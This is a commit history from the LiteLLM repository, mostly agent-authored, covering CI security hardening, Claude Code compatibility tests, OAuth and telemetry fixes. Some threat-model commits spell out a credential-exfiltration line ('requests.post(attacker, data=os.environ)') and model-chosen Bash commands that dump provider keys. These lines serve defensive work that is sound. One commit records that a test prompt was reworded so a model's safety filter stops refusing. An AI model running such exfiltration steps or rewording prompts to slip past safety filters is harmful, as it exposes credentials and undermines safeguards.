Commit graph

39348 commits

Author SHA1 Message Date
Cursor Agent
83ea86718b
fix(ci): scrub pytest env + narrow Bash tool-use to exact echo pong
Address two new Veria comments (2026-05-18T00:10:41Z) on the
claude_code_compat_pr_gate job:

1. .circleci/config.yml (Veria: provider credentials exposed to PR code)

   The pytest step runs PR-controlled test code (anything under
   tests/claude_code/) and the CircleCI job env carries the provider
   creds used to start the proxy container. A malicious PR could add
   `requests.post(attacker, data=os.environ)` to any test or
   conftest hook and exfiltrate ANTHROPIC_API_KEY / AWS_* /
   VERTEXAI_* / AZURE_FOUNDRY_* / GITHUB_TOKEN.

   Pytest only needs to talk to the proxy at localhost:4000, so the
   credentials are not legitimately required in pytest's env. Wrap
   the invocation in `env -i` with a minimal allowlist (PATH /
   HOME / USER / TERM / LANG / LC_ALL / TMPDIR + the four
   proxy/result-path vars pytest actually reads). Pinned by a new
   test in test_circleci_pr_gate_wiring.py so the scrub cannot
   silently regress.

2. tests/claude_code/{tool_use,tool_use_streaming,thinking_with_tool_use}
   (Veria: model-controlled Bash execution in CI)

   The three Bash-using feature directories passed `--allowed-tools
   Bash` unrestricted, which lets a compromised provider response
   choose any host command to run instead of `echo pong`. On the
   PR-gate machine executor that command could `docker inspect
   compat-proxy` to dump provider creds from the proxy container.

   Tighten every Bash-using cell (15 files total, 5 providers × 3
   feature dirs) to:

     - --allowed-tools 'Bash(echo pong)' — exact-match pattern per
       Claude Code's permission rule syntax. A different command
       does not match the allow rule.
     - --permission-mode dontAsk — auto-denies tool calls outside the
       allow rule instead of falling back to the headless default
       (which would defeat the explicit-allow contract).

   thinking_with_tool_use prompts are tightened to pin the command
   to 'echo pong' so the cell can run under the new restriction
   while still exercising the thinking + tool_use shape.

   Pinned by a new parametrized test (15 cells × 2 properties = 30
   cases) in test_bash_tool_restrictions.py.

The model-Bash mitigation is layered on top of the existing
cli_driver env allowlist (which already scrubs provider creds from
the CLI subprocess env, so even a malicious `echo $ANTHROPIC_API_KEY`
prints nothing) and the build-and-test branch filter (which keeps
external forks from running this job at all). It is not a substitute
for a fully sandboxed CLI runner; the residual risk of Claude Code's
built-in read-only `echo` auto-approve is documented in the per-cell
comments alongside the restriction.

All 223 tests/claude_code/ unit tests pass.

Co-authored-by: Cursor Agent <cursoragent@cursor.com>
2026-05-18 00:25:43 +00:00
Cursor Agent
c941291567
fix(ci): scrub provider secrets from env around PR-gate resolver + npm install
Address two related Veria comments on the claude_code_compat_pr_gate
job:

1. (line ~2320) The PR-gate version resolver is PR-controlled Python
   that runs in the same CircleCI job as the provider secrets injected
   later into the proxy container. A malicious PR could modify
   tests/claude_code/pr_gate_version_resolver.py to read
   ANTHROPIC_API_KEY / AWS_* / VERTEXAI_* / AZURE_FOUNDRY_* /
   GITHUB_TOKEN out of os.environ and exfiltrate them over the
   resolver's outbound npm registry HTTPS call.

2. (line ~2335) `npm install -g @anthropic-ai/claude-code` runs the
   package's `postinstall: node install.cjs` script (verified
   against the npm registry metadata for @anthropic-ai/claude-code),
   which executes arbitrary code from npm with the full job env.
   `claude --version` on the next line also runs package code. A
   compromised package release (or transitive registry hijack) could
   exfiltrate the same provider credentials. --ignore-scripts is not
   viable: the postinstall is the step that fetches the platform
   binary, so skipping it would leave the install unusable.

Mitigation:

- Wrap both invocations in `env -i` with a minimal allowlist
  (PATH / HOME / USER / TERM / LANG / LC_ALL / TMPDIR — plus
  NVM_DIR + CLAUDE_CODE_VERSION on the npm step). BASH_ENV is
  intentionally NOT passed through so the scrubbed subshell can't
  re-source prior steps' exports.

- Pin the scrub with two new unit tests in
  test_circleci_pr_gate_wiring.py so a future YAML refactor cannot
  silently drop the env -i wrapper and revert the mitigation. The
  tests verify both that `env -i` is present in each step and that
  it precedes the actual at-risk invocation in the command body.

Verified locally that `env -i PATH=$PATH HOME=$HOME ... uv run
--no-sync python -m tests.claude_code.pr_gate_version_resolver` still
resolves and prints a CLI version successfully.

Co-authored-by: Cursor Agent <cursoragent@cursor.com>
2026-05-18 00:00:35 +00:00
Cursor Agent
a1f0ef2a99
fix(claude_code): verify streaming wire in basic_messaging_streaming cells
Address the Greptile concern that basic_messaging_streaming and
basic_messaging_non_streaming used the same implementation, so a proxy
that buffered the upstream stream would silently show green for the
streaming row.

The fix:

- _basic_messaging.run_basic_messaging_cell accepts verify_streaming=True,
  which passes --include-partial-messages to the claude CLI. That flag
  causes the CLI to emit one stream_event record per upstream SSE event
  (message_start, content_block_delta, message_stop, ...). A buffering
  proxy collapses the stream to a single non-streaming response, so
  zero stream_event records are emitted.

- The cell rejects any model whose stream_event count is below
  MIN_STREAM_DELTA_EVENTS (2) -- safely above the buffered case for any
  non-trivial reply. Same all-must-pass shape as the existing
  tool_use_streaming row.

- All five basic_messaging_streaming/test_*.py per-provider cells now
  pass verify_streaming=True; the non-streaming variants are unchanged.

- New unit tests cover the helper, the partial-messages flag wiring,
  the streamed/buffered branching, and the all-models-must-stream
  contract.

Co-authored-by: Cursor Agent <cursoragent@cursor.com>
2026-05-17 22:47:47 +00:00
Cursor Agent
0915e87f08
fix(ci): bugbot — persist compat-results artifacts from PR gate
The conftest's pytest_sessionfinish writes per-cell tagged-union JSON
(compat-results.json) and the per-provider rate-limit summary to paths
controlled by COMPAT_RESULTS_PATH / COMPAT_RATE_LIMIT_SUMMARY_PATH.
The PR gate never set either env var, so the artifacts were written to
the working directory — but store_test_results only collects
test-results/junit.xml, leaving the per-cell JSON unreachable from the
CircleCI artifact browser. Reviewers triaging a red PR gate couldn't
pull the cell-level breakdown without re-running.

Point both env vars at a dedicated compat-artifacts/ directory and add
a store_artifacts step so the JSON blobs become downloadable. Also
extend the existing PR-gate wiring test to pin all three pieces:
COMPAT_RESULTS_PATH override, COMPAT_RATE_LIMIT_SUMMARY_PATH override,
and at least one store_artifacts step whose path matches the directory
the exports point at. Without the cross-check, a future refactor could
break the chain (e.g. only export the env vars, or only add the
store_artifacts step) and the wiring would silently drop the artifacts
again.

Co-authored-by: Mateo Wang <mateo-berri@users.noreply.github.com>
2026-05-17 21:39:48 +00:00
Cursor Agent
c23b1bba8c
fix(cron): bugbot — paginate all release pages to pick highest-semver stable
The release pagination loop in run_daily.sh used to break the moment a
page contained any v*-stable tag. GitHub's /releases endpoint orders by
created_at, not semver, so a freshly-cut backport on an older series
(e.g. v1.80.1-stable published today) can appear on an earlier page than
a higher-versioned release (v1.83.0-stable published two weeks ago).
The early-break would silently pin the cron to the stale tag because
the higher-versioned release on a later page never made it into the
merged set the final sort_by consumed — and the cron would publish a
compatibility matrix against a stale LiteLLM version with no visible
signal that anything was wrong.

Keep the empty-page guard (so a quiet release feed still doesn't burn
through the full 5-page cap) but drop the broken early-break.

Tests live in tests/claude_code/_publisher_unit_tests/ (mirroring the
existing _driver_unit_tests / _builder_unit_tests / _pr_gate_unit_tests
naming convention already excluded from the PR-gate pytest run). They:
- Statically assert the buggy length>0 + break combo is not in the
  pagination loop body.
- Statically assert the empty-page guard is still in place.
- Drive the actual run_daily.sh resolution snippet with a fake curl
  whose page 1 contains a low-version backport stable and page 2
  contains the high-version stable, then assert that the high-version
  tag is the one resolved. This is the end-to-end regression test.

Co-authored-by: Mateo Wang <mateo-berri@users.noreply.github.com>
2026-05-17 21:39:36 +00:00
Cursor Agent
c432c8d937
fix: clear manifest cache between sessions and align PR gate pytest with cron
- Clear _manifest_feature_ids LRU cache in pytest_sessionstart so manifest
  changes between pytest.main() invocations within the same process are
  picked up, preventing silent result drops.
- Add --ignore flags for the internal _*_unit_tests/ subdirectories to the
  Claude Code compat PR gate CircleCI job to match the cron run_daily.sh
  pytest invocation.

Co-authored-by: Yassin Kortam <yassin@berri.ai>
2026-05-17 07:04:49 +00:00
Cursor Agent
b24059a92f
claude_code compat: skip skipped reports; drop unreachable stream-events check
- conftest: pytest_runtest_makereport now early-returns on report.skipped
  so pytest.skip(...) inside a compat test body doesn't get recorded as
  a phantom 'fail' row via the not-failed/empty-collected branch.

- _basic_messaging: drop require_stream_events. The check (not outcome.events)
  cannot catch a buffering regression because cli_driver uses
  subprocess.run(capture_output=True), which only exposes the post-exit
  stdout blob — buffered-then-flushed and truly streamed responses are
  indistinguishable. The check was also unreachable as an independent
  failure path (empty events -> empty text -> the text check fires first).
  Update all five streaming callers and docstrings accordingly.

Co-authored-by: Yassin Kortam <yassin@berri.ai>
2026-05-17 06:51:02 +00:00
Cursor Agent
f41d3f91a3
fix(claude_code): harden parallel runner + de-dup basic_messaging cells
- run_claude_models_parallel: catch all exceptions in the per-model
  worker and wrap unexpected ones into a ClaudeCLIError so the
  documented 'errors as values' contract holds for OSError, ValueError,
  etc., not just ClaudeCLIError. Without this, an unexpected raise in
  any layer (rate limiter file I/O, infer_provider, etc.) abandons the
  remaining models' results and crashes the calling test.
- test_run_claude_places_extra_args_before_prompt: drop the dead first
  branch of the 'or' assertion — cmd[-3:] never matches that shape, so
  the alternative was misleading dead code.
- basic_messaging_{non_streaming,streaming}/test_*.py: extract the
  shared cell body into tests/claude_code/_basic_messaging.py.
  Each per-provider file now declares its model list and calls
  run_basic_messaging_cell(), eliminating ~700 lines of copy-paste
  across 10 files. Updated _builder_unit_tests/test_v0_layout.py to
  accept the helper-based pattern alongside direct run_claude() calls.

Co-authored-by: Yassin Kortam <yassin@berri.ai>
2026-05-17 06:35:15 +00:00
mateo-berri
9a4eb2dea5
test(claude_code): reject empty stdin_input symmetric to prompt
run_claude validated empty prompt strings but silently accepted
stdin_input="", letting an empty stdin reach the subprocess and surface
as a confusing CLI failure instead of a clear ValueError.
2026-05-17 06:13:48 +00:00
Cursor Agent
0901890994
revert: remove unrelated team admins auth change from project_info
Some checks failed
Unit Tests: Proxy DB Operations / key-generation (push) Has been cancelled
Unit Tests: Proxy DB Operations / logging-misc (push) Has been cancelled
Unit Tests: Security / security (push) Has been cancelled
Unit Tests: Proxy DB Operations / assert-shard-coverage (push) Has been cancelled
Unit Tests: Proxy DB Operations / proxy-utils (push) Has been cancelled
Unit Tests: Proxy DB Operations / auth-checks (push) Has been cancelled
Unit Tests: Proxy DB Operations / budgets (push) Has been cancelled
Unit Tests: Proxy DB Operations / custom-logging (push) Has been cancelled
Unit Tests: Proxy DB Operations / db-and-spend (push) Has been cancelled
Unit Tests: Proxy DB Operations / endpoints-and-responses (push) Has been cancelled
Unit Tests: Proxy DB Operations / guardrails-hooks (push) Has been cancelled
Unit Tests: Proxy DB Operations / jwt-and-keys (push) Has been cancelled
Unit Tests: Proxy DB Operations / proxy-runtime (push) Has been cancelled
Unit Tests: Proxy DB Operations / proxy-server-core (push) Has been cancelled
Unit Tests: Proxy DB Operations / schema-migration (push) Has been cancelled
This auth-widening change to the project_info endpoint was unrelated to
this PR's test-infrastructure scope. Reverting so it can be reviewed and
shipped on its own.

Co-authored-by: Yassin Kortam <yassin@berri.ai>
2026-05-17 02:03:58 +00:00
Cursor Agent
6b91a7acd8
fix(claude_code): rate-limit HTTP probe rows alongside CLI rows
probe_count_tokens and probe_tool_search were sending requests
directly via httpx with no call to the cross-process RateLimiter
that cli_driver.run_claude uses. During a full matrix run those
unthrottled probes would silently violate the limiter's aggregate
per-provider budget and could push adjacent CLI cells over the
429 threshold.

Acquire one token from the same process-wide limiter (keyed by
infer_provider(model)) before each probe, with an injectable
rate_limiter seam matching run_claude's API for unit tests.

Co-authored-by: Yassin Kortam <yassin@berri.ai>
2026-05-17 01:40:23 +00:00
Cursor Agent
6d6689258e
Reject simultaneous prompt and stdin_input in run_claude
Co-authored-by: Yassin Kortam <yassin@berri.ai>
2026-05-17 01:26:33 +00:00
mateo-berri
3ce6ce2f77
Merge branch 'litellm_internal_staging' into litellm_compat_matrix_stack 2026-05-17 01:14:32 +00:00
Mateo Wang
1b0ae3af83
fix(mcp-oauth): PROXY_BASE_URL escape hatch + diagnostic logging for {"detail":"invalid_request"} (#28086)
* fix(mcp-oauth): add PROXY_BASE_URL escape hatch + diagnostic logging for invalid_request

Customers hitting "{"detail":"invalid_request"}" on the MCP /authorize
endpoint had no way to recover when their ingress mangles X-Forwarded-*
headers (the same-origin check in validate_trusted_redirect_uri compares
the browser-supplied redirect_uri against get_request_base_url, which is
reconstructed from those headers).

Two contained changes:

  1. get_request_base_url now honours PROXY_BASE_URL as the canonical
     public origin when set, bypassing the X-Forwarded-* trust gate
     entirely. Operators who know their public URL can set it once
     instead of debugging ingress header rewrites.

  2. The rejection path in validate_trusted_redirect_uri emits a WARN
     log carrying the redirect_uri, computed proxy base, and the
     X-Forwarded-* / Host headers seen. A bare 400 was undiagnosable;
     this turns it into a one-line root-cause.

* test(mcp-oauth): capture warnings from correct logger ("LiteLLM")

Co-authored-by: Yassin Kortam <yassin@berri.ai>

* fix(mcp-oauth): reject malformed PROXY_BASE_URL with one-shot diagnostic

A scheme-less PROXY_BASE_URL (e.g. "litellm.example.com" instead of
"https://litellm.example.com") would sail through urlparse with empty
scheme + netloc, silently breaking every same-origin compare in
validate_trusted_redirect_uri and leaving the operator staring at the
same opaque 400 the env var was meant to fix.

Validate it once at read time: only honour values that parse as
http(s) URLs with a non-empty netloc; otherwise log a one-shot WARN
naming the bad value and fall through to the request-derived origin
so the proxy still serves traffic.

* fix(mcp/oauth): normalize PROXY_BASE_URL to strip query/fragment

Match the X-Forwarded-* path's normalization so a configured
PROXY_BASE_URL containing a query string or fragment does not break
downstream f-string concatenation like f"{base_url}/callback".

Co-authored-by: Yassin Kortam <yassin@berri.ai>

* refactor(mcp-oauth): drop non-essential comments from PROXY_BASE_URL changes

Strip narrative comments and verbose docstrings added in this PR; the
code is intuitive enough on its own and the log messages already carry
their own diagnostic context. Pre-existing comments are left untouched.

---------

Co-authored-by: Cursor Agent <cursoragent@cursor.com>
Co-authored-by: Yassin Kortam <yassin@berri.ai>
2026-05-16 17:48:03 -07:00
Yassin Kortam
3d5a9ede05
feat: add Terraform stacks for deploying LiteLLM on AWS and GCP (#27673)
- Add AWS ECS Fargate stack with Aurora Postgres (IAM auth), ElastiCache Redis, S3, ALB with path-based routing to gateway/backend/ui components, Application Auto Scaling, and automated DB bootstrap + prisma migration via local-exec provisioners
- Add GCP Cloud Run stack with Cloud SQL Postgres (password auth), Memorystore Redis, GCS, external HTTPS load balancer with serverless NEGs and URL map routing, and automated prisma migration via Cloud Run Job
- Both stacks support typed proxy_config input mirroring the helm chart's gateway.config.proxy_config, per-component extra env vars, and Secret Manager references for provider API keys
- Gateway/backend services depend on terraform_data.migration so they never start before the schema is in place, eliminating crash-loop windows on first apply
- AWS stack uses IAM database authentication with a one-shot Fargate bootstrap task that creates and grants the rds_iam role to the application user; GCP stack uses password auth assembled at container startup to avoid Cloud SQL Auth Proxy sidecar complexity
- Add .gitignore rules for Terraform state files, plan files, tfvars inputs, provider binaries, and crash logs while explicitly keeping .terraform.lock.hcl for provider version pinning
- Include terraform.tfvars.example files, provider lock files, and comprehensive README documentation covering architecture, TLS setup, image pull strategies, and quick-start instructions for both stacks

Co-authored-by: Yassin Kortam <yassinkortam@g.ucla.edu>
2026-05-16 17:26:20 -07:00
Shivam Rawat
fbe0ee81f1
fix(proxy): sort BYOK models by their displayed name in /v2/model/info (#28079)
* fix(proxy): sort BYOK models by team_public_model_name in /v2/model/info

Team BYOK rows persist an internal `model_name` like
`model_name_{team_id}_{uuid}` and expose the user-facing name via
`model_info.team_public_model_name`. The UI's `getDisplayModelName`
and the search filter already fall back to that field, but
`_sort_models` was keying off the raw `model_name` — so BYOK rows
ranked by their opaque IDs and clumped at the end of the alphabetized
list instead of interleaving with non-BYOK rows.

Match the UI/search behavior: prefer `team_public_model_name` when
present, fall back to `model_name` otherwise.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(proxy): case-insensitive DB-side search for BYOK models

`_apply_search_filter_to_models` used Prisma's JSON path
`string_contains` to match the BYOK `team_public_model_name` field, but
that operator is case-sensitive in Postgres (no `mode: insensitive`
flag like column-level string filters have). So a search for "claude"
missed a stored "Claude Sonnet" via the DB branch even though the
router-side path matched it case-insensitively.

Widen the JSON branch to "row has a team_public_model_name set" and
filter case-insensitively in Python so DB-only BYOK rows match the
same terms users see in the UI. This also drops the now-unused
DB-level page-size optimization and `sort_by` knob — the in-Python
filter is the source of truth for `db_models_total_count` now.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(proxy): scope BYOK search results to caller's accessible teams

`_apply_search_filter_to_models` was widened to fetch every row with a
`team_public_model_name` set so case-insensitive search could match
mixed-case stored names. `/v2/model/info` is reachable by non-admin
keys though, and the helper ran before `include_team_models` / `teamId`
filtering — so a non-admin caller could search a common substring like
"claude" and see BYOK rows belonging to teams they're not a member of.

Resolve the caller's team membership once (admin → no scoping, else
their `user_row.teams`) and drop BYOK rows (those with
`model_info.team_id` set) outside that scope on both the router-side
matches and the over-broad DB query, before display-name matching.
Non-team rows are unaffected and remain gated by the existing
`include_team_models` / `direct_access` paths.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(proxy): search by team_public_model_name and scope teamId queries

- /v2/model/info search now matches both `model_name` and
  `model_info.team_public_model_name`, so team BYOK rows (which persist
  an internal `model_name_{team_id}_{uuid}`) are findable by the public
  name shown in the UI. DB query OR-includes a JSON-path match on
  `team_public_model_name` for rows that exist only in the DB.
- `_filter_models_by_team_id` no longer short-circuits on the viewer's
  `direct_access` flag — that describes the admin viewer's own
  permissions and would leak every public model into a team-scoped view.
  Models are kept only when they belong to the team (own BYOK, in
  access_via_team_ids, or reachable via team.models / access groups).
- Added `_authorize_team_id_query`: the untrusted `teamId` query
  parameter now requires the caller to be a proxy admin or a member of
  the requested team, otherwise returns 403. Without this, any
  authenticated user could enumerate another team's BYOK metadata by
  guessing the team id.
- `_get_caller_byok_team_scope` now treats `PROXY_ADMIN_VIEW_ONLY` the
  same as `PROXY_ADMIN` (both are admin roles); previously VIEW_ONLY
  admins fell through to a user-id team lookup and saw only their own
  teams' BYOK rows.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(proxy): bound BYOK search DB fetch in /v2/model/info

Previously the DB-side search OR'd a JSON-path predicate
`{model_info: {path: [team_public_model_name], string_contains: ""}}`
to compensate for Prisma's case-sensitive JSON `string_contains` on
Postgres. That predicate matches every row that has any
`team_public_model_name` set, so any authenticated caller could force a
full BYOK-table read with `/v2/model/info?search=x` regardless of page
size.

Drop the JSON-path branch. The DB query now does a bounded
`model_name contains <search>` lookup. BYOK rows that are loaded into
the router are still searchable by their `team_public_model_name` via
the router-side filter; only the rare edge case of a BYOK row that
exists only in the DB (router sync failed) loses display-name search,
which is an acceptable trade-off given the DoS surface.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(proxy): bound DB find_many in /v2/model/info search

The previous bounding patch dropped the page-aware `take=N` on
`find_many`, so a broad `?search=model` would load and decrypt every
matching DB row on each request even though the response only returns
one page.

Restore bounded fetches in `_apply_search_filter_to_models`:

* Unsorted searches use `take = max(0, page * size - router_count)`,
  i.e. exactly one page worth of remaining DB rows.
* Sorted searches need ordering across the full match set, so they cap
  at `_SORTED_SEARCH_DB_FETCH_CAP = 500` instead of fetching everything.
* Total count comes from a cheap `count(...)` query so pagination stays
  accurate without materializing every row.

Wired `page`, `size`, and `sortBy` through from the endpoint and added
a regression test covering both `take` values.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(proxy): extract DB-fetch helper to satisfy PLR0915

_apply_search_filter_to_models tripped Ruff's "too many statements"
(51 > 50) after the bounded-fetch fix. Move the DB-side block into
`_fetch_db_models_for_search`, which keeps the same behavior:

* Bounded `take` via page math (unsorted) or `_SORTED_SEARCH_DB_FETCH_CAP`
  (sorted)
* Cheap `count(...)` for accurate pagination totals
* Caller-team scope applied to fetched rows before decrypt

Pure refactor; no behavior change. All 8 BYOK/team tests still pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* style: apply black formatting to _fetch_db_models_for_search

CI's "Check Black formatting" step flagged one line in the helper added
in d55eecf6af. No behavior change.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
2026-05-16 15:46:21 -07:00
yuneng-jiang
cd551f6fdb
chore: update Next.js build artifacts (2026-05-16 22:22 UTC, node v20.20.2) (#28095) 2026-05-16 15:32:18 -07:00
ryan-crabbe-berri
86f73e5e8a
feat(otel): set http.response.status_code on the success SERVER span (#28090)
The proxy SERVER span ("Received Proxy Server Request") only carried
http.response.status_code on failures (set in _record_exception_on_span),
so success traces had no 2xx bucket — error-ratio and status-breakdown
dashboards were missing their denominator and the span violated the HTTP
semconv (the attribute is required whenever a response is sent). Add a
set_response_status_code_attribute helper and call it from
async_post_call_success_hook with 200, symmetric with the failure path
and the existing route/preprocessing-duration SERVER-span attributes.
2026-05-16 15:29:56 -07:00
Shivam Rawat
1b9acecbb3
feat(model_catalog): add Azure AI Foundry GPT-5.4 model metadata (#28030)
* feat(model_catalog): add Azure AI Foundry GPT-5.4 model metadata

Register azure_ai GPT-5.4 variants with pricing, context limits from
Foundry catalog, and capability flags for cost routing and tooling.

Co-authored-by: Cursor <cursoragent@cursor.com>

* fix(model_catalog): tighten Azure AI GPT-5.4 cost and capability metadata

Add supports_web_search for base GPT-5.4 aliases, priority-tier Pro rates,
and mini/nano above-272k plus priority pricing for correct spend math.

Co-authored-by: Cursor <cursoragent@cursor.com>

* fix(model_catalog): sync web_search flag on Azure AI GPT-5.4 dated backup row

Mirror supports_web_search for azure_ai/gpt-5.4-2026-03-05 in the backup
catalog so it matches model_prices_and_context_window.json.

Co-authored-by: Cursor <cursoragent@cursor.com>

---------

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-16 15:08:10 -07:00
yuneng-jiang
fbb39ef94d
build(deps): pin openai==2.33.0 in uv.lock (#28088)
openai 2.34.0 began rejecting an explicitly-passed empty-string api_key
at client construction (raises OpenAIError before any request), which
broke tests/local_testing/test_exceptions.py::test_exception_with_headers
and related cases after uv.lock floated openai 2.33.0 -> 2.36.0.

Pin back to 2.33.0 (within the existing pyproject >=2.20.0,<3.0.0 range)
as a temporary stopgap; longer-term fix to follow.
2026-05-16 14:49:31 -07:00
ryan-crabbe-berri
0300333753
feat(otel): OTel-standard attributes on the proxy SERVER span (status code, route/path, preprocessing latency) (#28040)
* feat(otel): expose http.response.status_code on failure spans

Set the OTel-standard http.response.status_code (integer) on failure
spans alongside the existing OpenInference error.code (kept for
back-compat). error.type is already emitted via ERROR_TYPE.

Crucially, also record structured error attributes on the proxy SERVER
span ('Received Proxy Server Request') from async_post_call_failure_hook
- the only place the SERVER span is in hand. _handle_failure records on
the litellm_request child span (the parent span is not propagated into
its kwargs), so prior to this change the SERVER span that dashboards
query carried only span status, never error.code/error.type. Reuses
_record_exception_on_span + StandardLoggingPayloadSetup.get_error_information
so values match the child span.

Tests: recorder unit coverage + a hook-driven test asserting the SERVER
span is stamped (the gap recorder-only tests missed). Full
test_opentelemetry.py suite: 197 passed.

* feat(otel): set http.route + url.path on the proxy SERVER span

Add the OTel-standard http.route (low-cardinality route template, e.g.
/v1/threads/{thread_id}/runs) and url.path (literal path) to the SERVER
span ('Received Proxy Server Request') so dashboards can group traffic
by endpoint instead of seeing every path param as a unique value.

Same architectural gap as the status-code commit: the success/failure
logging handlers write the litellm_request CHILD span, and
_handle_success explicitly refuses to copy to the SERVER span. Verified
with a console-exporter run that the SERVER span was bare on success.

Unlike error info, route/path are known at request time, so set them
directly on the freshly-created SERVER span in user_api_key_auth (one
edit point, works for success and failure, no hook-ordering risk):
- http.route from the matched FastAPI route (scope['route'].path),
  empirically confirmed populated at auth-dependency time.
- url.path from the existing literal-path variable.
New get_request_route_template helper + set_proxy_request_route_attributes
(no-op on None span, so the Langfuse override stays safe).

Tests: route-attribute setter + route-template helper edges. Full
test_opentelemetry.py and test_auth_utils.py green.

* feat(otel): set litellm.preprocessing.duration_ms on the proxy SERVER span

Expose the total time LiteLLM spends before the upstream provider
request begins (auth + parsing + pre-call hooks) as a single number on
the SERVER span ('Received Proxy Server Request'). Window:
proxy-receive -> FIRST provider handoff.

Retry semantics: first attempt only (pure preprocessing, excludes
retry loops + backoff). api_call_start_time is overwritten on every
attempt, so a set-once first_api_call_start_time pins the first handoff.

Same architectural gap as the prior two commits: the success/failure
logging handlers write the litellm_request CHILD span, not the SERVER
span. Set it instead from the post-call hooks on
user_api_key_dict.parent_otel_span.

Failure-path subtlety: request_data.pop('litellm_logging_obj') runs
before the failure-hook loop, so the failure hook can't read the
logging object. litellm_received_at is propagated via the existing
request->metadata channel, and first_api_call_start_time is mirrored
onto litellm_params.metadata, so both anchors survive into request_data
and the OTel helper reads them uniformly for success and failure.

Edits: user_api_key_auth (stash receive instant), litellm_pre_call_utils
(propagate it), litellm_logging (set-once first handoff + metadata
mirror), opentelemetry (constant + set_preprocessing_duration_attribute,
called from both post-call hooks).

Tests: duration helper (both container shapes, missing/negative/None
edges) + set-once invariant (retry doesn't overwrite, metadata mirror).
test_opentelemetry.py + test_auth_utils.py + test_litellm_logging.py:
447 passed. Verified live: SERVER span carries the attribute on success
and failure, coexisting with the status-code and route attributes.

* fix(otel): MyPy type-narrowing for status-code + preprocessing-duration

No behavior change. MyPy (CI lint) flagged:
- error_information["error_code"] is str|None: narrow via a None-checked
  local before int().
- _to_timestamp returns Optional[float]: resolve both anchors and return
  early if either is None instead of subtracting possibly-None floats.

* fix(otel): stop polluting user request metadata with first_api_call_start_time

The PR3 set-once preprocessing anchor was mirrored into
litellm_params["metadata"] from core litellm_logging.py. That dict is
the caller's request metadata, mutated in place and shared across every
call path including pure SDK (litellm.acreate_batch). It got echoed into
LiteLLMBatch(metadata=...), which the OpenAI batch schema types as
Dict[str, str] -> pydantic ValidationError on a datetime value.

- litellm_logging.py: set first_api_call_start_time only on
  model_call_details (success path reads it there directly).
- proxy/utils.py: post_call_failure_hook lifts it off the logging object
  into request_data (internal top-level key, same convention as the
  other proxy-internal request_data keys) right before the existing
  litellm_logging_obj pop. Never touches user metadata.
- opentelemetry.py: read the anchor from the container top level
  (model_call_details on success, request_data on failure).
- Tests updated; add TestPostCallFailureHookLiftsFirstApiCallStartTime.

Fixes the batches_testing regression introduced on this branch.

* chore(otel): trim verbose comments to concise rationale

Collapse multi-line why-blocks to one or two lines and drop process/plan references (PR-numbering, "the plan") from test comments. No behavior change.
2026-05-16 13:45:08 -07:00
mateo-berri
be65b4e23b feat(claude_code): rename thinking row + add 4 feature rows (15 total)
Matrix grows from 11 to 15 feature rows. All new tests collected + 180
unit tests still pass; smoke runs hit real LiteLLM bug surfaces on
bedrock_invoke, bedrock_converse, and vertex_ai (cells correctly red
in PR #142).

Rename
------
`extended_thinking` -> `thinking` (directory, manifest id+name, 5
test fn names, 5 docstrings, builder unit-test fixtures, sample JSON,
run_compat.sh). Existing test logic already covers both manual
(`thinking.type=enabled`, Haiku 4.5) and adaptive
(`thinking.type=adaptive`, Opus 4.7) shapes because Claude Code picks
the shape per model from `--effort max`; the name change just stops
the column from looking like a Claude 3.7 reference.

New rows
--------
- structured_outputs (5 files, CLI `--json-schema`). Claude Code
  synthesizes a single `StructuredOutput` tool from the schema and
  surfaces the tool_use input as `structured_output` on the trailing
  `result` event. Test ships its own `_validate_against_schema` so
  we don't take a jsonschema dep just for matrix surface.

- count_tokens (5 files, HTTP probe). POSTs the proxy's
  `/v1/messages/count_tokens` directly and asserts the response is
  `{input_tokens: positive int}`. No CLI hook exists for this
  endpoint; the test goes through the new http_probe helper instead.

- tool_search (5 files, HTTP probe). Sends
  `tools: [{type: tool_search_tool_regex_20251119, name:
  tool_search_tool_regex}]` and asserts the proxy doesn't 400. MCP
  fan-out via `--mcp-config` would also exercise the tool-search
  beta header path, but it's flaky w.r.t. Claude Code's internal
  tool-deferral threshold; the HTTP probe hits the actual bug surface
  (per-provider beta-header translation `advanced-tool-use-2025-11-20`
  vs `tool-search-tool-2025-10-19`).

- long_context_1m (5 files, CLI `--betas context-1m-2025-08-07
  --max-budget-usd 6`). A ~210k-token padded prompt over stdin
  exercises the 1M-context beta. Sonnet 4.6 + Opus 4.7 only --
  Haiku 4.5's window is 200k, so it's excluded from MODELS (not
  marked not_applicable) to keep the per-cell aggregator semantics
  intact. Prompt uses a document-style preamble + 8 cycling pangrams
  rather than repeating identical chunks; without that, Opus 4.7
  trips the safety filter mid-response with a Usage Policy refusal.
  `--max-budget-usd 6` is a runaway-loop guard, ~2x worst-case Opus
  per-cell spend.

New helper
----------
`tests/claude_code/http_probe.py`: shared `ProbeResult` dataclass
plus per-endpoint `probe_*` + `assert_*_shape` pairs for the
HTTP-probe rows. Uses httpx with `anthropic-version: 2023-06-01` and
a 30s timeout.
2026-05-16 20:37:01 +00:00
mateo-berri
891da2372d fix(cron_vm): publish from agent-shin fork + harden systemd unit
The cron host has no write access to BerriAI/litellm-docs by design. PRs
now open from a long-lived fork at agent-shin/litellm-docs:

- run_daily.sh validates AGENT_SHIN_GITHUB_TOKEN up front (failing 30 min
  into a run because the env file is missing one line is wasted spend).
- The pre-commit shim adds a transient `fork` remote with the token
  embedded in the URL, force-pushes the branch, then removes the remote
  so the token never lives on disk.
- `gh pr create --head agent-shin:<branch>` opens the cross-repo PR
  with GH_TOKEN scoped to AGENT_SHIN_GITHUB_TOKEN. A second
  `gh pr edit --add-reviewer` runs under GITHUB_TOKEN (mateo-berri's
  PAT) because agent-shin's PAT lacks RequestReviewsByLogin permission
  on the upstream repo.
- PR_REVIEWERS env var (default `mateo-berri`) controls who gets
  auto-tagged; empty disables.

Also bring litellm-compat-matrix.service to working state:

